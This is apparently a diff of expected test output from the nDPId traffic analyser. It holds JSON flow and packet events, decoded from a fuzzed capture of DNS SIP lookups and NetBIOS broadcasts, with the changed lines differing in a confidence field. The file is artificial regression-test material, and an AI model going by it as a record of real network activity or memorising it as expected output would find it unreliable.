+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470865651,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1120470865712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470865712,"pkt":"ADBUADRWAODtAW69CABFAABIa8cAAIARS4rAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaU0EX3VkcANzaXAJY3tiZXJbaXRNAmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865712,"flow_last_seen":1120470865712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470865712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sim._udp.sip.c_ber_itm.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1120470866711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470866711,"pkt":"ADBUADRWAODtAW69CABFAABIa8gAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYzRiZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":561,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470865712,"flow_last_seen":1120470866711,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470866711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.c4bercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1120470868714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470868714,"pkt":"ADB0ADRWAODtAW69CABFAABIa8kAAIARS4jAqAECwKgBAQr2ADUANKezghsBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1120470658556,"flow_last_seen":1120470672075,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470684859,"flow_last_seen":1120470684859,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1120469540839,"flow_last_seen":1120470830228,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2992,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2056,"global_ts_msec":1120470882724} 00395{"packet_event_id":1,"packet_event_name":"packet","packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"thread_ts_msec":1120470877496,"pkt":"ADBUADRWAODtAW69CAhFAABEa88AAIARS4bCqAECwKgBAQr3ADUAMHGrsxwAAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1120470882726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470882726,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvcAR1QnsxyAAAABAAEAAAAAASVzAAEwAzEyNwdpbi1hZGRyBGF2cGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470882846,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1120470882846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470882846,"pkt":"ADBUADRWAODtAW69CABFAABIa9EAAIARS4DAqAECwKgBAQr4lzUAND6uRB4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1120470883845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470883845,"pkt":"ADBUADRWAODtAW69CABFAABIa9IAAIARS3\/AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAHghAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1120470885848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69CABFAABIa9MAAIARS37AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43392,"global_ts_msec":1120470887851} 00401{"packet_event_id":1,"packet_event_name":"packet","packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43392,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69qYBFAABI\/dQAAIARS33AqAECwKgBAXP4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaWJ5AmRrAAAhAAE="} 
